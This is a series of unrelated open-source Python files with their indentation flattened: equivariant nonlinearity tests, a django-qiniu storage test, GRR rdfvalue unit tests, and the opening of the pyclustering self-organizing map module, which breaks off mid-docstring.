gates = ['gated'] * ngates + ['gate'] * ngates
r = FieldType(g, reprs)
nnl = InducedGatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_o2_norm_relu(self):
g = FlipRot2dOnR2(-1, 10)
r = FieldType(g, list(g.representations.values()) * 4)
nnl = NormNonLinearity(r, function='n_relu')
nnl.check_equivariance()
def test_o2_norm_sigmoid(self):
g = FlipRot2dOnR2(-1, 10)
r = FieldType(g, list(g.representations.values()) * 4)
nnl = NormNonLinearity(r, function='n_sigmoid')
nnl.check_equivariance()
def test_o2_pointwise_relu(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'pointwise' in r.supported_nonlinearities]
r = FieldType(g, reprs)
nnl = PointwiseNonLinearity(r, function='p_relu')
nnl.check_equivariance()
def test_o2_pointwise_sigmoid(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'pointwise' in r.supported_nonlinearities]
r = FieldType(g, reprs)
nnl = PointwiseNonLinearity(r, function='p_sigmoid')
nnl.check_equivariance()
def test_o2_gated_one_input_shuffled_gated(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(reprs)
reprs += [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
r = FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_o2_gated_one_input_sorted_gated(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 2
r = FieldType(g, reprs).sorted()
ngates = len(r)
reprs = [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
r = r + FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_o2_gated_one_input_all_shuffled(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(reprs)
reprs += [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
t = list(zip(reprs, gates))
random.shuffle(t)
reprs, gates = zip(*t)
r = FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_o2_gated_two_inputs_shuffled_gated(self):
g = FlipRot2dOnR2(-1, 10)
gated = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(gated)
gates = [g.trivial_repr] * ngates
gates = FieldType(g, gates)
gated = FieldType(g, gated)
nnl = GatedNonLinearity2((gates, gated))
nnl.check_equivariance()
def test_o2_gated_two_inputs_sorted_gated(self):
g = FlipRot2dOnR2(-1, 10)
gated = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 2
ngates = len(gated)
gates = [g.trivial_repr] * ngates
gated = FieldType(g, gated).sorted()
gates = FieldType(g, gates)
nnl = GatedNonLinearity2((gates, gated))
nnl.check_equivariance()
def test_dihedral_gated1_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'gated' not in r.supported_nonlinearities:
r1 = FieldType(g, [r, g.trivial_repr])
gates = ['gated', 'gate']
self.assertRaises(AssertionError, GatedNonLinearity1, r1, gates=gates)
for r in g.representations.values():
if 'gate' not in r.supported_nonlinearities:
r1 = FieldType(g, [g.trivial_repr, r])
gates = ['gated', 'gate']
self.assertRaises(AssertionError, GatedNonLinearity1, r1, gates=gates)
def test_dihedral_gated2_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'gated' not in r.supported_nonlinearities:
gates = FieldType(g, [g.trivial_repr])
gated = FieldType(g, [r])
self.assertRaises(AssertionError, GatedNonLinearity2, (gates, gated))
for r in g.representations.values():
if 'gate' not in r.supported_nonlinearities:
gates = FieldType(g, [r])
gated = FieldType(g, [g.trivial_repr])
self.assertRaises(AssertionError, GatedNonLinearity2, (gates, gated))
def test_dihedral_norm_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'norm' not in r.supported_nonlinearities:
r1 = FieldType(g, [r])
self.assertRaises(AssertionError, NormNonLinearity, r1)
def test_dihedral_pointwise_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'pointwise' not in r.supported_nonlinearities:
r1 = FieldType(g, [r])
self.assertRaises(AssertionError, PointwiseNonLinearity, r1)
def test_dihedral_concat_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'concatenated' not in r.supported_nonlinearities:
r1 = FieldType(g, [r])
self.assertRaises(AssertionError, ConcatenatedNonLinearity, r1)
if __name__ == '__main__':
unittest.main()
|
tests/test_private_storage.py | glasslion/django-qiniu-storage | 209 | 21365 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals, print_function
from datetime import datetime
import os
from os.path import dirname, join
import sys
import time
import unittest
import uuid
import logging
LOGGING_FORMAT = '\n%(levelname)s %(asctime)s %(message)s'
logging.basicConfig(level=logging.INFO, format=LOGGING_FORMAT)
logger = logging.getLogger(__name__)
import six
import django
from requests.exceptions import ConnectionError
from qiniu import BucketManager
from .utils import retry
# Add repo/demo_site to sys.path
DEMO_SITE_DIR = join(dirname(dirname(__file__)), 'demo_site')
sys.path.append(DEMO_SITE_DIR)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "demo_site.settings")
try:
django.setup()
except AttributeError:
# Setup isn't necessary in Django < 1.7
pass
from django.conf import settings
from qiniustorage.backends import QiniuPrivateStorage, QiniuFile, get_qiniu_config
from qiniustorage.utils import QiniuError
USING_TRAVIS = os.environ.get('USING_TRAVIS', None) is None
UNIQUE_PATH = str(uuid.uuid4())
class QiniuStorageTest(unittest.TestCase):
def setUp(self):
self.storage = QiniuPrivateStorage(
bucket_name=get_qiniu_config('QINIU_PRIVATE_BUCKET_NAME'),
bucket_domain=get_qiniu_config('QINIU_PRIVATE_BUCKET_DOMAIN'),
)
def test_read_file(self):
ASSET_FILE_NAMES = [u'Read.txt', u'读.txt']
for assert_file_name in ASSET_FILE_NAMES:
REMOTE_PATH = join(UNIQUE_PATH, assert_file_name)
test_file = six.BytesIO()
test_file.write(u"你好世界 Hello World".encode('utf-8'))
test_file.seek(0)
self.storage.save(REMOTE_PATH, test_file)
fil = self.storage.open(REMOTE_PATH, 'r')
assert fil._is_read == False
content = fil.read()
assert content.startswith(u"你好")
assert fil._is_read == True
# Test open mode
fil = self.storage.open(REMOTE_PATH, 'rb')
bin_content = fil.read()
assert bin_content.startswith(u"你好".encode('utf-8'))
@classmethod
def teardown_class(cls):
"""Delete all files in the test bucket.
"""
storage = QiniuPrivateStorage(
bucket_name=get_qiniu_config('QINIU_PRIVATE_BUCKET_NAME'),
bucket_domain=get_qiniu_config('QINIU_PRIVATE_BUCKET_DOMAIN'),
)
auth = storage.auth
bucket = BucketManager(auth)
while True:
ret, eof, info = bucket.list(storage.bucket_name, limit=100)
if ret is None:
print(info)
break
for item in ret['items']:
name = item['key']
if six.PY2:
name = name.encode('utf-8')
ret, info = bucket.delete(storage.bucket_name, name)
if ret is None:
print(info)
if eof:
break
|
grr/core/grr_response_core/lib/rdfvalue_test.py | khanhgithead/grr | 4,238 | 21380 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Tests for utility classes."""
import datetime
import sys
import unittest
from absl import app
from absl.testing import absltest
from grr_response_core.lib import rdfvalue
from grr.test_lib import test_lib
long_string = (
"迎欢迎\n"
"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Morbi luctus "
"ex sed dictum volutpat. Integer maximus, mauris at tincidunt iaculis, "
"felis magna scelerisque ex, in scelerisque est odio non nunc. "
"Suspendisse et lobortis augue. Donec faucibus tempor massa, sed dapibus"
" erat iaculis ut. Vestibulum eu elementum nulla. Nullam scelerisque "
"hendrerit lorem. Integer vitae semper metus. Suspendisse accumsan "
"dictum felis. Etiam viverra, felis sed ullamcorper vehicula, libero "
"nisl tempus dui, a porta lacus erat et erat. Morbi mattis elementum "
"efficitur. Pellentesque aliquam placerat mauris non accumsan.")
class RDFValueTest(absltest.TestCase):
"""RDFValue tests."""
def testStr(self):
"""Test RDFValue.__str__."""
self.assertEqual(str(rdfvalue.RDFInteger(1)), "1")
self.assertEqual(str(rdfvalue.RDFString(long_string)), long_string)
# TODO(hanuszczak): Current implementation of `repr` for RDF values is broken
# and not in line with Python guidelines. For example, `repr` should be
# unambiguous whereas current implementation will trim long representations
# with `...`. Moreover, the representation for most types is questionable at
# best.
#
# The implementation should be fixed and proper tests should be written.
class RDFBytesTest(absltest.TestCase):
def testFromHumanReadable(self):
string = u"zażółć gęślą jaźń"
result = rdfvalue.RDFBytes.FromHumanReadable(string)
expected = rdfvalue.RDFBytes.FromSerializedBytes(string.encode("utf-8"))
self.assertEqual(result, expected)
class RDFStringTest(absltest.TestCase):
def testFromHumanReadable(self):
string = u"pchnąć w tę łódź jeża lub ośm skrzyń fig"
result = rdfvalue.RDFString.FromHumanReadable(string)
self.assertEqual(str(result), string)
def testEqualWithBytes(self):
self.assertEqual(rdfvalue.RDFString(u"foo"), b"foo")
self.assertNotEqual(rdfvalue.RDFString(u"foo"), b"\x80\x81\x82")
def testLessThanWithBytes(self):
self.assertLess(rdfvalue.RDFString(u"abc"), b"def")
self.assertGreater(rdfvalue.RDFString(u"xyz"), b"ghi")
self.assertLess(rdfvalue.RDFString(u"012"), b"\x80\x81\x81")
# TODO: Python on Windows ships with UCS-2 by default, which does
# not properly support unicode.
@unittest.skipIf(
sys.maxunicode <= 65535,
"Your Python installation does not properly support Unicode (likely: "
"Python with no UCS4 support on Windows.")
def testLenOfEmoji(self):
self.assertLen(rdfvalue.RDFString("🚀🚀"), 2)
class RDFIntegerTest(absltest.TestCase):
def testFromHumanReadable(self):
result = rdfvalue.RDFInteger.FromHumanReadable(u"42")
self.assertEqual(result, rdfvalue.RDFInteger(42))
def testFromHumanReadablePositive(self):
result = rdfvalue.RDFInteger.FromHumanReadable(u"+108")
self.assertEqual(result, rdfvalue.RDFInteger(108))
def testFromHumanReadableNegative(self):
result = rdfvalue.RDFInteger.FromHumanReadable(u"-1337")
self.assertEqual(result, rdfvalue.RDFInteger(-1337))
def testFromHumanReadableZero(self):
result = rdfvalue.RDFInteger.FromHumanReadable(u"0")
self.assertEqual(result, rdfvalue.RDFInteger(0))
def testFromHumanReadableRaisesOnNonInteger(self):
with self.assertRaises(ValueError):
rdfvalue.RDFInteger.FromHumanReadable(u"12.3")
def testFromHumanReadableRaisesOnNonDecimal(self):
with self.assertRaises(ValueError):
rdfvalue.RDFInteger.FromHumanReadable(u"12A")
class RDFDateTimeTest(absltest.TestCase):
def testLerpMiddle(self):
start_time = rdfvalue.RDFDatetime.FromHumanReadable("2010-01-01")
end_time = start_time + rdfvalue.Duration.From(10, rdfvalue.DAYS)
lerped_time = rdfvalue.RDFDatetime.Lerp(
0.5, start_time=start_time, end_time=end_time)
self.assertEqual(lerped_time,
start_time + rdfvalue.Duration.From(5, rdfvalue.DAYS))
def testLerpZero(self):
start_time = rdfvalue.RDFDatetime.FromHumanReadable("2000-01-01")
end_time = rdfvalue.RDFDatetime.FromHumanReadable("2020-01-01")
lerped_time = rdfvalue.RDFDatetime.Lerp(
0.0, start_time=start_time, end_time=end_time)
self.assertEqual(lerped_time, start_time)
def testLerpOne(self):
start_time = rdfvalue.RDFDatetime.FromHumanReadable("2000-01-01")
end_time = rdfvalue.RDFDatetime.FromHumanReadable("2020-01-01")
lerped_time = rdfvalue.RDFDatetime.Lerp(
1.0, start_time=start_time, end_time=end_time)
self.assertEqual(lerped_time, end_time)
def testLerpQuarter(self):
start_time = rdfvalue.RDFDatetime.FromHumanReadable("2000-01-01")
end_time = start_time + rdfvalue.Duration.From(4, rdfvalue.DAYS)
lerped_time = rdfvalue.RDFDatetime.Lerp(
0.25, start_time=start_time, end_time=end_time)
self.assertEqual(lerped_time,
start_time + rdfvalue.Duration.From(1, rdfvalue.DAYS))
def testLerpRaisesTypeErrorIfTimesAreNotRDFDatetime(self):
now = rdfvalue.RDFDatetime.Now()
with self.assertRaisesRegex(TypeError, "non-datetime"):
rdfvalue.RDFDatetime.Lerp(0.0, start_time=10, end_time=now)
with self.assertRaisesRegex(TypeError, "non-datetime"):
rdfvalue.RDFDatetime.Lerp(
0.0,
start_time=now,
end_time=rdfvalue.Duration.From(1, rdfvalue.DAYS))
def testLerpRaisesValueErrorIfProgressIsNotNormalized(self):
start_time = rdfvalue.RDFDatetime.FromHumanReadable("2010-01-01")
end_time = rdfvalue.RDFDatetime.FromHumanReadable("2011-01-01")
with self.assertRaises(ValueError):
rdfvalue.RDFDatetime.Lerp(1.5, start_time=start_time, end_time=end_time)
with self.assertRaises(ValueError):
rdfvalue.RDFDatetime.Lerp(-0.5, start_time=start_time, end_time=end_time)
def testFloorToMinutes(self):
dt = rdfvalue.RDFDatetime.FromHumanReadable("2011-11-11 12:34:56")
expected = rdfvalue.RDFDatetime.FromHumanReadable("2011-11-11 12:34")
self.assertEqual(
dt.Floor(rdfvalue.Duration.From(60, rdfvalue.SECONDS)), expected)
def testFloorToHours(self):
dt = rdfvalue.RDFDatetime.FromHumanReadable("2011-11-11 12:34")
expected = rdfvalue.RDFDatetime.FromHumanReadable("2011-11-11 12:00")
self.assertEqual(
dt.Floor(rdfvalue.Duration.From(1, rdfvalue.HOURS)), expected)
def testFloorToDays(self):
dt = rdfvalue.RDFDatetime.FromHumanReadable("2011-11-11 12:34")
expected = rdfvalue.RDFDatetime.FromHumanReadable("2011-11-11")
self.assertEqual(
dt.Floor(rdfvalue.Duration.From(1, rdfvalue.DAYS)), expected)
def testFloorExact(self):
dt = rdfvalue.RDFDatetime.FromHumanReadable("2011-11-11 12:34:56")
self.assertEqual(dt.Floor(rdfvalue.Duration.From(1, rdfvalue.SECONDS)), dt)
class RDFDatetimeSecondsTest(absltest.TestCase):
def testFromDatetime_withMicroSeconds(self):
dt_with_micros = datetime.datetime(2000, 1, 1, microsecond=5000)
dt = datetime.datetime(2000, 1, 1)
self.assertEqual(
rdfvalue.RDFDatetimeSeconds.FromDatetime(dt_with_micros),
rdfvalue.RDFDatetimeSeconds.FromDatetime(dt))
def testBug122716179(self):
d = rdfvalue.RDFDatetimeSeconds.FromSecondsSinceEpoch(1)
self.assertEqual(d.AsMicrosecondsSinceEpoch(), 1000000)
diff = rdfvalue.RDFDatetimeSeconds(10) - rdfvalue.Duration("3s")
self.assertEqual(diff.AsMicrosecondsSinceEpoch(), 7000000)
class DurationSecondsTest(absltest.TestCase):
def testPublicAttributes(self):
duration = rdfvalue.DurationSeconds.FromHumanReadable("1h")
self.assertEqual(duration.ToInt(rdfvalue.SECONDS), 3600)
self.assertEqual(duration.ToInt(rdfvalue.MILLISECONDS), 3600 * 1000)
self.assertEqual(duration.microseconds, 3600 * 1000 * 1000)
def testFromDays(self):
self.assertEqual(
rdfvalue.DurationSeconds.From(2, rdfvalue.DAYS),
rdfvalue.DurationSeconds.FromHumanReadable("2d"))
self.assertEqual(
rdfvalue.DurationSeconds.From(31, rdfvalue.DAYS),
rdfvalue.DurationSeconds.FromHumanReadable("31d"))
def testFromHours(self):
self.assertEqual(
rdfvalue.DurationSeconds.From(48, rdfvalue.HOURS),
rdfvalue.DurationSeconds.FromHumanReadable("48h"))
self.assertEqual(
rdfvalue.DurationSeconds.From(24, rdfvalue.HOURS),
rdfvalue.DurationSeconds.FromHumanReadable("24h"))
def testFromSeconds(self):
self.assertEqual(
rdfvalue.DurationSeconds.From(1337,
rdfvalue.SECONDS).ToInt(rdfvalue.SECONDS),
1337)
def testFromMicroseconds(self):
duration = rdfvalue.DurationSeconds.From(3000000, rdfvalue.MICROSECONDS)
self.assertEqual(duration.microseconds, 3000000)
self.assertEqual(duration.ToInt(rdfvalue.SECONDS), 3)
def testFloatConstructorRaises(self):
with self.assertRaises(TypeError):
rdfvalue.DurationSeconds(3.14)
def testSerializeToBytes(self):
self.assertEqual(
b"0",
rdfvalue.DurationSeconds.From(0, rdfvalue.WEEKS).SerializeToBytes())
self.assertEqual(
b"1",
rdfvalue.DurationSeconds.From(1, rdfvalue.SECONDS).SerializeToBytes())
self.assertEqual(
b"2",
rdfvalue.DurationSeconds.From(2, rdfvalue.SECONDS).SerializeToBytes())
self.assertEqual(
b"999",
rdfvalue.DurationSeconds.From(999, rdfvalue.SECONDS).SerializeToBytes())
self.assertEqual(
b"1000",
rdfvalue.DurationSeconds.From(1000,
rdfvalue.SECONDS).SerializeToBytes())
def testFromWireFormat(self):
for i in [0, 7, 1337]:
val = rdfvalue.DurationSeconds.FromWireFormat(i)
self.assertEqual(i, val.ToInt(rdfvalue.SECONDS))
val2 = rdfvalue.DurationSeconds.FromWireFormat(
val.SerializeToWireFormat())
self.assertEqual(val, val2)
MAX_UINT64 = 18446744073709551615
class DurationTest(absltest.TestCase):
def testInitializationFromMicroseconds(self):
for i in [0, 1, 7, 60, 1337, MAX_UINT64]:
val = rdfvalue.Duration.From(i, rdfvalue.MICROSECONDS)
self.assertEqual(i, val.microseconds)
self.assertEqual(val,
rdfvalue.Duration.FromHumanReadable("{} us".format(i)))
self.assertEqual(val, rdfvalue.Duration(i))
def testInitializationFromMilliseconds(self):
for i in [0, 1, 7, 60, 1337, MAX_UINT64 // 1000]:
val = rdfvalue.Duration.From(i, rdfvalue.MILLISECONDS)
self.assertEqual(i * 1000, val.microseconds)
self.assertEqual(val,
rdfvalue.Duration.FromHumanReadable("{} ms".format(i)))
def testInitializationFromSeconds(self):
for i in [0, 1, 7, 60, 1337, MAX_UINT64 // 1000000]:
val = rdfvalue.Duration.From(i, rdfvalue.SECONDS)
self.assertEqual(i * 1000000, val.microseconds)
self.assertEqual(val,
rdfvalue.Duration.FromHumanReadable("{} s".format(i)))
def testInitializationFromMinutes(self):
for i in [0, 1, 7, 60, 1337, MAX_UINT64 // 60000000]:
val = rdfvalue.Duration.From(i, rdfvalue.MINUTES)
self.assertEqual(i * 60000000, val.microseconds)
self.assertEqual(val,
rdfvalue.Duration.FromHumanReadable("{} m".format(i)))
def testInitializationFromHours(self):
for i in [0, 1, 7, 60, 1337, MAX_UINT64 // 3600000000]:
val = rdfvalue.Duration.From(i, rdfvalue.HOURS)
self.assertEqual(i * 3600000000, val.microseconds)
self.assertEqual(val,
rdfvalue.Duration.FromHumanReadable("{} h".format(i)))
def testInitializationFromDays(self):
for i in [0, 1, 7, 60, 1337, MAX_UINT64 // 86400000000]:
val = rdfvalue.Duration.From(i, rdfvalue.DAYS)
self.assertEqual(i * 86400000000, val.microseconds)
self.assertEqual(val,
rdfvalue.Duration.FromHumanReadable("{} d".format(i)))
def testInitializationFromWeeks(self):
for i in [0, 1, 7, 60, 1337, MAX_UINT64 // 604800000000]:
val = rdfvalue.Duration.From(i, rdfvalue.WEEKS)
self.assertEqual(i * 604800000000, val.microseconds)
self.assertEqual(val,
rdfvalue.Duration.FromHumanReadable("{} w".format(i)))
def testConversionToInt(self):
for i in [0, 1, 7, 60, 1337, 12345, 123456, 1234567, MAX_UINT64]:
val = rdfvalue.Duration.From(i, rdfvalue.MICROSECONDS)
self.assertEqual(val.ToInt(rdfvalue.MICROSECONDS), i)
self.assertEqual(val.ToInt(rdfvalue.MILLISECONDS), i // 1000)
self.assertEqual(val.ToInt(rdfvalue.SECONDS), i // (1000 * 1000))
self.assertEqual(val.ToInt(rdfvalue.MINUTES), i // (60 * 1000 * 1000))
self.assertEqual(val.ToInt(rdfvalue.HOURS), i // (60 * 60 * 1000 * 1000))
self.assertEqual(
val.ToInt(rdfvalue.DAYS), i // (24 * 60 * 60 * 1000 * 1000))
self.assertEqual(
val.ToInt(rdfvalue.WEEKS), i // (7 * 24 * 60 * 60 * 1000 * 1000))
def testConversionToFractional(self):
for i in [0, 1, 7, 60, 1337, 12345, 123456, 1234567, MAX_UINT64]:
val = rdfvalue.Duration.From(i, rdfvalue.MICROSECONDS)
self.assertAlmostEqual(val.ToFractional(rdfvalue.MICROSECONDS), i)
self.assertAlmostEqual(val.ToFractional(rdfvalue.MILLISECONDS), i / 1000)
self.assertAlmostEqual(
val.ToFractional(rdfvalue.SECONDS), i / (1000 * 1000))
self.assertAlmostEqual(
val.ToFractional(rdfvalue.MINUTES), i / (60 * 1000 * 1000))
self.assertAlmostEqual(
val.ToFractional(rdfvalue.HOURS), i / (60 * 60 * 1000 * 1000))
self.assertAlmostEqual(
val.ToFractional(rdfvalue.DAYS), i / (24 * 60 * 60 * 1000 * 1000))
self.assertAlmostEqual(
val.ToFractional(rdfvalue.WEEKS),
i / (7 * 24 * 60 * 60 * 1000 * 1000))
def testStringDeserialization(self):
for i in [0, 1, 7, 60, 1337, 12345, 123456, 1234567, MAX_UINT64]:
val = rdfvalue.Duration.From(i, rdfvalue.MICROSECONDS)
self.assertEqual(
rdfvalue.Duration.FromSerializedBytes(val.SerializeToBytes()), val)
def testHumanReadableStringSerialization(self):
self.assertEqual("0 us", str(rdfvalue.Duration.From(0, rdfvalue.WEEKS)))
self.assertEqual("1 us",
str(rdfvalue.Duration.From(1, rdfvalue.MICROSECONDS)))
self.assertEqual("2 us",
str(rdfvalue.Duration.From(2, rdfvalue.MICROSECONDS)))
self.assertEqual("999 us",
str(rdfvalue.Duration.From(999, rdfvalue.MICROSECONDS)))
self.assertEqual("1 ms",
str(rdfvalue.Duration.From(1000, rdfvalue.MICROSECONDS)))
self.assertEqual("1 ms",
str(rdfvalue.Duration.From(1, rdfvalue.MILLISECONDS)))
self.assertEqual(
"{} us".format(MAX_UINT64),
str(rdfvalue.Duration.From(MAX_UINT64, rdfvalue.MICROSECONDS)))
self.assertEqual("3 s", str(rdfvalue.Duration.From(3, rdfvalue.SECONDS)))
self.assertEqual("3 m", str(rdfvalue.Duration.From(3, rdfvalue.MINUTES)))
self.assertEqual("3 h", str(rdfvalue.Duration.From(3, rdfvalue.HOURS)))
self.assertEqual("3 d", str(rdfvalue.Duration.From(3, rdfvalue.DAYS)))
self.assertEqual("3 w", str(rdfvalue.Duration.From(21, rdfvalue.DAYS)))
def testSerializeToBytes(self):
self.assertEqual(
b"0",
rdfvalue.Duration.From(0, rdfvalue.WEEKS).SerializeToBytes())
self.assertEqual(
b"1",
rdfvalue.Duration.From(1, rdfvalue.MICROSECONDS).SerializeToBytes())
self.assertEqual(
b"2",
rdfvalue.Duration.From(2, rdfvalue.MICROSECONDS).SerializeToBytes())
self.assertEqual(
b"999",
rdfvalue.Duration.From(999, rdfvalue.MICROSECONDS).SerializeToBytes())
self.assertEqual(
b"1000",
rdfvalue.Duration.From(1000, rdfvalue.MICROSECONDS).SerializeToBytes())
self.assertEqual(
str(MAX_UINT64).encode("utf-8"),
rdfvalue.Duration.From(MAX_UINT64,
rdfvalue.MICROSECONDS).SerializeToBytes())
self.assertEqual(
b"3000000",
rdfvalue.Duration.From(3, rdfvalue.SECONDS).SerializeToBytes())
def testAdditionOfDurationsIsEqualToIntegerAddition(self):
for a in [0, 1, 7, 60, 1337, MAX_UINT64 // 2]:
for b in [0, 1, 7, 60, 1337, MAX_UINT64 // 2]:
self.assertEqual(
rdfvalue.Duration(a) + rdfvalue.Duration(b),
rdfvalue.Duration(a + b))
def testSubtractionOfDurationsIsEqualToIntegerSubtraction(self):
for a in [0, 1, 7, 60, 1337, MAX_UINT64]:
for b in [0, 1, 7, 60, 1337, MAX_UINT64]:
self.assertEqual(
rdfvalue.Duration(a) - rdfvalue.Duration(min(a, b)),
rdfvalue.Duration(a - min(a, b)))
def testFromWireFormat(self):
for i in [0, 7, 1337, MAX_UINT64]:
val = rdfvalue.Duration.FromWireFormat(i)
self.assertEqual(i, val.microseconds)
def testSubtractionFromDateTimeIsEqualToIntegerSubtraction(self):
for a in [0, 1, 7, 60, 1337]:
for b in [0, 1, 7, 60, 1337]:
lhs = rdfvalue.RDFDatetime.FromMicrosecondsSinceEpoch(a)
rhs = rdfvalue.Duration(min(a, b))
result = lhs - rhs
self.assertEqual(result.AsMicrosecondsSinceEpoch(), a - min(a, b))
def testAdditionToDateTimeIsEqualToIntegerAddition(self):
for a in [0, 1, 7, 60, 1337]:
for b in [0, 1, 7, 60, 1337]:
lhs = rdfvalue.RDFDatetime.FromMicrosecondsSinceEpoch(a)
rhs = rdfvalue.Duration(b)
result = lhs + rhs
self.assertEqual(result.AsMicrosecondsSinceEpoch(), a + b)
def testComparisonIsEqualToIntegerComparison(self):
for a in [0, 1, 7, 60, 1337, MAX_UINT64 - 1, MAX_UINT64]:
for b in [0, 1, 7, 60, 1337, MAX_UINT64 - 1, MAX_UINT64]:
dur_a = rdfvalue.Duration(a)
dur_b = rdfvalue.Duration(b)
if a > b:
self.assertGreater(dur_a, dur_b)
if a >= b:
self.assertGreaterEqual(dur_a, dur_b)
if a == b:
self.assertEqual(dur_a, dur_b)
if a <= b:
self.assertLessEqual(dur_a, dur_b)
if a < b:
self.assertLess(dur_a, dur_b)
if a != b:
self.assertNotEqual(dur_a, dur_b)
class DocTest(test_lib.DocTest):
module = rdfvalue
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
|
pyclustering/nnet/som.py | JosephChataignon/pyclustering | 1,013 | 21403 | """!
@brief Neural Network: Self-Organized Feature Map
@details Implementation based on paper @cite article::nnet::som::1, @cite article::nnet::som::2.
@authors <NAME> (<EMAIL>)
@date 2014-2020
@copyright BSD-3-Clause
"""
import math
import random
import matplotlib.pyplot as plt
import pyclustering.core.som_wrapper as wrapper
from pyclustering.core.wrapper import ccore_library
from pyclustering.utils import euclidean_distance_square
from pyclustering.utils.dimension import dimension_info
from enum import IntEnum
class type_conn(IntEnum):
"""!
@brief Enumeration of connection types for SOM.
@see som
"""
## Grid type of connections when each oscillator has connections with left, upper, right, lower neighbors.
grid_four = 0
## Grid type of connections when each oscillator has connections with left, upper-left, upper, upper-right, right, right-lower, lower, lower-left neighbors.
grid_eight = 1
## Grid type of connections when each oscillator has connections with left, upper-left, upper-right, right, right-lower, lower-left neighbors.
honeycomb = 2
    ## Grid type of connections when existence of each connection is defined by the SOM rule on each step of simulation.
func_neighbor = 3
class type_init(IntEnum):
"""!
@brief Enumeration of initialization types for SOM.
@see som
"""
## Weights are randomly distributed using Gaussian distribution (0, 1).
random = 0
## Weights are randomly distributed using Gaussian distribution (input data centroid, 1).
random_centroid = 1
    ## Weights are randomly distributed using Gaussian distribution (input data centroid, surface of input data).
random_surface = 2
## Weights are distributed as a uniform grid that covers whole surface of the input data.
uniform_grid = 3
class som_parameters:
"""!
@brief Represents SOM parameters.
"""
def __init__(self):
"""!
@brief Creates SOM parameters.
"""
        ## Defines an initialization way for neuron weights (random, random in center of the input data, randomly distributed in data, distributed in line with uniform grid).
self.init_type = type_init.uniform_grid
## Initial radius. If the initial radius is not specified (equals to `None`) then it will be calculated by SOM.
self.init_radius = None
## Rate of learning.
self.init_learn_rate = 0.1
        ## Condition that defines when the learning process should be stopped. It is used when the autostop mode is on.
self.adaptation_threshold = 0.001
## Seed for random state (by default is `None`, current system time is used).
self.random_state = None
class som:
"""!
@brief Represents self-organized feature map (SOM).
@details The self-organizing feature map (SOM) method is a powerful tool for the visualization of
              high-dimensional data. It converts complex, nonlinear statistical relationships between
high-dimensional data into simple geometric relationships on a low-dimensional display.
    @details `ccore` option can be specified in order to control the use of the C++ implementation of the pyclustering library. By
default C++ implementation is on. C++ implementation improves performance of the self-organized feature
map.
Example:
@code
import random
from pyclustering.utils import read_sample
from pyclustering.nnet.som import som, type_conn, type_init, som_parameters
from pyclustering.samples.definitions import FCPS_SAMPLES
# read sample 'Lsun' from file
sample = read_sample(FCPS_SAMPLES.SAMPLE_LSUN)
# create SOM parameters
parameters = som_parameters()
            # create self-organized feature map with size 10x10
            rows = 10  # ten rows
            cols = 10  # ten columns
            structure = type_conn.grid_four  # each neuron has max. four neighbors.
            network = som(rows, cols, structure, parameters)
            # train network on 'Lsun' sample during 100 epochs.
network.train(sample, 100)
# simulate trained network using randomly modified point from input dataset.
index_point = random.randint(0, len(sample) - 1)
point = sample[index_point] # obtain randomly point from data
point[0] += random.random() * 0.2 # change randomly X-coordinate
point[1] += random.random() * 0.2 # change randomly Y-coordinate
index_winner = network.simulate(point)
            # check which objects from the input data are closest to the randomly modified point.
index_similar_objects = network.capture_objects[index_winner]
# neuron contains information of encoded objects
print("Point '%s' is similar to objects with indexes '%s'." % (str(point), str(index_similar_objects)))
print("Coordinates of similar objects:")
for index in index_similar_objects: print("\tPoint:", sample[index])
# result visualization:
# show distance matrix (U-matrix).
network.show_distance_matrix()
# show density matrix (P-matrix).
network.show_density_matrix()
# show winner matrix.
network.show_winner_matrix()
# show self-organized map.
network.show_network()
@endcode
There is a visualization of 'Target' sample that was done by the self-organized feature map:
@image html target_som_processing.png
"""
@property
def size(self):
"""!
@brief Return size of self-organized map that is defined by total number of neurons.
@return (uint) Size of self-organized map (number of neurons).
"""
if self.__ccore_som_pointer is not None:
self._size = wrapper.som_get_size(self.__ccore_som_pointer)
return self._size
@property
def weights(self):
"""!
@brief Return weight of each neuron.
@return (list) Weights of each neuron.
"""
if self.__ccore_som_pointer is not None:
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
return self._weights
@property
def awards(self):
"""!
@brief Return amount of captured objects by each neuron after training.
@return (list) Amount of captured objects by each neuron.
@see train()
"""
if self.__ccore_som_pointer is not None:
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
return self._award
@property
def capture_objects(self):
"""!
@brief Returns indexes of captured objects by each neuron.
@details For example, a network with size 2x2 has been trained on a sample with five objects. Suppose neuron #1
                  won an object with index `1`, neuron #2 won objects `0`, `3`, `4`, neuron #3 did not win anything and
